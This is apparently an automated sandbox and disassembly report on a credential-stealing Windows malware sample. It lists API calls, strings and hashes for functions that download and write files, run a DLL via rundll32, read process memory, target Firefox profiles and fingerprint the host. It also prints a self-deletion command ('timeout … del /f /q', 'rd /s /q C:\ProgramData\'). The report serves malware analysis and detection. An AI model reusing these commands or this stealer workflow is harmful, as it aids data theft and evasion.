Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
String ID: GET
API String ID: 442264750-1805413626
Opcode ID: 8c549f9e6c3a38d0d8b8d9c906f89390bcfd24b67ea2e21b5078c2165d75efa5
Instruction ID: db9b65f6ff3aa58b69ab7c80ee4b507d2baca41c59675a027e4a866d6253625d
Opcode Fuzzy Hash: 8c549f9e6c3a38d0d8b8d9c906f89390bcfd24b67ea2e21b5078c2165d75efa5
Instruction Fuzzy Hash: FC5165B1A00219BBDB20DBA5DD45FAF77B9EB88701F005129FB05B72C1D7749E058BA4

Function 00405010 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,?), ref: 0040507A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
HttpOpenRequestA.WININET(00000000,GET,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 004050DC
InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040512E
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405177
InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 004051C5
InternetCloseHandle.WININET(00000000), ref: 004051D0
InternetCloseHandle.WININET(?), ref: 004051DA
InternetCloseHandle.WININET(00000000), ref: 004051E4

Strings

GET, xrefs: 004050D6
ERROR, xrefs: 0040513B

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$FileOpenReadRequestlstrcpy$ConnectCrackInfoOptionQuerySendlstrlen
String ID: ERROR$GET
API String ID: 1863336362-3591763792
Opcode ID: 309dd610708473b97c58760f4a521b0d3c6200544722ad7f5fb3e7345648b7c0
Instruction ID: 1ac627e5dad41aa046ddd859517fa52cc070feb9a932d89590bb6b8620beea7d
Opcode Fuzzy Hash: 309dd610708473b97c58760f4a521b0d3c6200544722ad7f5fb3e7345648b7c0
Instruction Fuzzy Hash: 1F515472A406186BEB20EB64DC46FEF7779EF44700F104139F605BB2D1DB786A058BA9

Function 00410420 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
HeapAlloc.KERNEL32(00000000), ref: 004104C6
wsprintfA.USER32 ref: 004104F9
lstrcatA.KERNEL32(00000000,004238B4), ref: 00410508
GetCurrentHwProfileA.ADVAPI32(?), ref: 00410515
lstrlenA.KERNEL32(00000000,Unknown), ref: 0041053E
lstrcatA.KERNEL32(00000000,00000000), ref: 00410568

Strings

{kA, xrefs: 00410464, 00410467
Unknown, xrefs: 00410528
C, xrefs: 00410446
{kA:\, xrefs: 0041057F, 004104D2

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heaplstrcat$AllocCurrentDirectoryInformationProcessProfileVolumeWindowslstrlenwsprintf
String ID: C$Unknown${kA${kA:\
API String ID: 3099411152-4130650692
Opcode ID: a6a328dd6331b7e02a1d71d5c5ca8fd2a58a50d3c2c538d52779942ee998bef1
Instruction ID: 2c5738cd0ea039ca6d181a749ddccaa7ec64b74ae76ae9b2a1b3dd877f563171
Opcode Fuzzy Hash: a6a328dd6331b7e02a1d71d5c5ca8fd2a58a50d3c2c538d52779942ee998bef1
Instruction Fuzzy Hash: 38419171A00218ABDB10EBA4DC46FEE777CEF44705F144169F605B7181EBB85A44CBEA

Function 00413230 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 134COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413249
memset.MSVCRT ref: 00413255
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041326A

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

ShellExecuteEx.SHELL32(0000003C), ref: 004133B5
memset.MSVCRT ref: 004133C2
memset.MSVCRT ref: 004133D4
ExitProcess.KERNEL32 ref: 004133E5

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

Strings

/c timeout /t 10 & del /f /q ", xrefs: 00413286
<, xrefs: 0041338D
" & exit, xrefs: 0041330F, 0041335D
" & rd /s /q "C:\ProgramData\, xrefs: 004132CC
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 0041331A

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpymemset$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\$<
API String ID: 1134881415-1686486140
Opcode ID: f5ef1bde2209cb44bd9b2305c3485f3a3ad62387029d00b8421b7b3c7d02bf74
Instruction ID: 508ff9f4bbc4465125e6e9774ac16dc64dc0f0eb0a86ee04c305785364366d08
Opcode Fuzzy Hash: f5ef1bde2209cb44bd9b2305c3485f3a3ad62387029d00b8421b7b3c7d02bf74
Instruction Fuzzy Hash: 1451EAB2C10118AACB15FFA1DC92DEEB778AF14704F50817EB21672491EB78674DCB98

Function 00416510 Relevance: 20.5, APIs: 4, Strings: 7, Instructions: 1232networksleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F8A0: lstrlenA.KERNEL32(004176BE,?,00000000,?,00416587,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 0040F8AB
Part of subcall function 0040F8A0: lstrcpyA.KERNEL32(00000000,004176BE), ref: 0040F8E2

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 00411400: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411439
Part of subcall function 00411400: Process32First.KERNEL32(00000000,00000128), ref: 00411449
Part of subcall function 00411400: Process32Next.KERNEL32(00000000,00000128), ref: 0041145B
Part of subcall function 00411400: StrCmpCA.SHLWAPI(?,00423EE4), ref: 00411470
Part of subcall function 00411400: FindCloseChangeNotification.KERNEL32(00000000), ref: 00411482

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,0251D430,00000000,?,004201E9,00000000,004176BE), ref: 00416A16
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B22
InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00416B3C

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6

Part of subcall function 00403E20: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403EAC
Part of subcall function 00403E20: StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000030), ref: 00403EC7

Part of subcall function 004123F0: StrCmpCA.SHLWAPI(00000000,block,?,00416B9A), ref: 0041240D
Part of subcall function 004123F0: ExitProcess.KERNEL32 ref: 00412418

Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,0251B858), ref: 0040E8C0
Part of subcall function 0040E870: StrCmpCA.SHLWAPI(00000000,0251B768), ref: 0040E947

Part of subcall function 00405BB0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405C3C
Part of subcall function 00405BB0: StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000030), ref: 00405C57

Part of subcall function 00411F00: strtok_s.MSVCRT ref: 00411F24

Sleep.KERNEL32(000003E8), ref: 00416F45

Part of subcall function 00415D00: lstrcatA.KERNEL32(?,0251D958,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415D5B
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,00000000), ref: 00415D7E
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415D9A
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DAE
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,024F8458), ref: 00415DC1
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,?), ref: 00415DD5
Part of subcall function 00415D00: lstrcatA.KERNEL32(?,0251E230), ref: 00415DE9

Part of subcall function 004045D0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641
Part of subcall function 004045D0: StrCmpCA.SHLWAPI(?,0251B748,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
Part of subcall function 004045D0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC

Strings

arp, xrefs: 0041731A
.exe, xrefs: 0041693D, 00417293
zapto, xrefs: 00417380
org, xrefs: 004173C4
dabl, xrefs: 0041733C
_DEBUG.zip, xrefs: 004173F9
http://, xrefs: 004172F8

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$InternetOpenlstrcpy$lstrlen$CreateDirectoryHeapProcessProcess32$AllocChangeCloseExitFindFirstInformationNextNotificationSleepSnapshotToolhelp32VolumeWindowsstrtok_s
String ID: .exe$_DEBUG.zip$arp$dabl$http://$org$zapto
API String ID: 1055840830-1018522893
Opcode ID: b433f065d575b5fd355346ac8f4bacad3d0ead1fc68a6ea0fe385f035e755d96
Instruction ID: f22d2bd86038d1de50829419776aae838be0a57aa5f174395c24aa0c803a3848
Opcode Fuzzy Hash: b433f065d575b5fd355346ac8f4bacad3d0ead1fc68a6ea0fe385f035e755d96
Instruction Fuzzy Hash: 8AA24472D10114AACB24FB61DC52EEEB778AF54304F50817EE506725D2EF382B4DCAA9

Function 00404E90 Relevance: 15.1, APIs: 10, Instructions: 125networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404ED3
StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,00000000), ref: 00404EEE
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,-00800100,00000000), ref: 00404F13
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000), ref: 00404F36
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404F4F
WriteFile.KERNEL32(00000000,?,?,0041361C,00000000,?,?,?,?,?,?,00000000), ref: 00404F76
InternetReadFile.WININET(00000000,?,00000400,?), ref: 00404FA0
CloseHandle.KERNEL32(00000000,?,00000400,?,?,?,?,?,?,00000000), ref: 00404FBC
InternetCloseHandle.WININET(00000000), ref: 00404FC3
InternetCloseHandle.WININET(00000000), ref: 00404FCA

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
String ID:
API String ID: 105467990-0
Opcode ID: 67a65968a0dd46d71c910ade9d970147224026b89045e8171dd020c445bd2163
Instruction ID: 49284951317d46ce046ac4b453f539dd1d19b3831e62d401432a72fc81568d3a
Opcode Fuzzy Hash: 67a65968a0dd46d71c910ade9d970147224026b89045e8171dd020c445bd2163
Instruction Fuzzy Hash: F3414FB2610205ABDB20EB71DC46FEE336CEB44704F505139F701B61D1DB78AA09CBA8

Function 0040E870 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 375COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,0251B858), ref: 0040E8C0
StrCmpCA.SHLWAPI(00000000,0251B768), ref: 0040E947
StrCmpCA.SHLWAPI(00000000,firefox), ref: 0040ECBD
StrCmpCA.SHLWAPI(00000000,0251B7D8), ref: 0040EA4C

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

StrCmpCA.SHLWAPI(00000000,0251B858), ref: 0040EB30
StrCmpCA.SHLWAPI(00000000,0251B768), ref: 0040EBB9

Strings

Stable\, xrefs: 0040E962, 0040EBD4
firefox, xrefs: 0040ECAF

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$firefox
API String ID: 3722407311-3160656979
Opcode ID: ddceee967766e4733b0cc700ffbe42629aec99189380b976368b69e60c1a9e81
Instruction ID: dc9232c6f18d92b7668f1a551db38a5b0db8dd03ba54f88d7fb460d1fcb80d8e
Opcode Fuzzy Hash: ddceee967766e4733b0cc700ffbe42629aec99189380b976368b69e60c1a9e81
Instruction Fuzzy Hash: 97E12371A002049BCB24FF65D956EDE77B9BF44304F40C53EEC49AB691DB38AA08CB95

Function 0040F550 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 192COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 0040F561
OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000030), ref: 0040F588
memset.MSVCRT ref: 0040F5E4
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040F63C
memset.MSVCRT ref: 0040F6CF

Strings

N0ZWFt, xrefs: 0040F692
65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F5FA, 0040F6E8

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Processmemset$MemoryOpenRead
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 2048220554-1622206642
Opcode ID: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
Instruction ID: a21cb42e5d324bd6ca82509aa78599428660c3814b2df02d38e35266ba1ec8a6
Opcode Fuzzy Hash: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
Instruction Fuzzy Hash: 93613471E00215AAEB309BA5DC45BAFB7B4AF84314F14453AE408B72C1E77C9948CBA9

Function 00413420 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,024F8CF0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9

Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D

ShellExecuteEx.SHELL32(0000003C), ref: 00413667

Strings

O7A, xrefs: 0041360C, 004136C3, 00413611
<, xrefs: 0041363A
"" , xrefs: 004134D2
C:\ProgramData\, xrefs: 0041344F
C:\Windows\system32\rundll32.exe, xrefs: 00413595
.dll, xrefs: 004134B0

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe$O7A
API String ID: 2215929589-785807056
Opcode ID: 4e0b2a9fa014d04dc608629bf2a064b0b909d33fd9d9d0cde451eae06aa6f39a
Instruction ID: af7763d1ac9f1e24f06ba5b7101d0506636d2fa2f8484cc67acb28b390f71f36
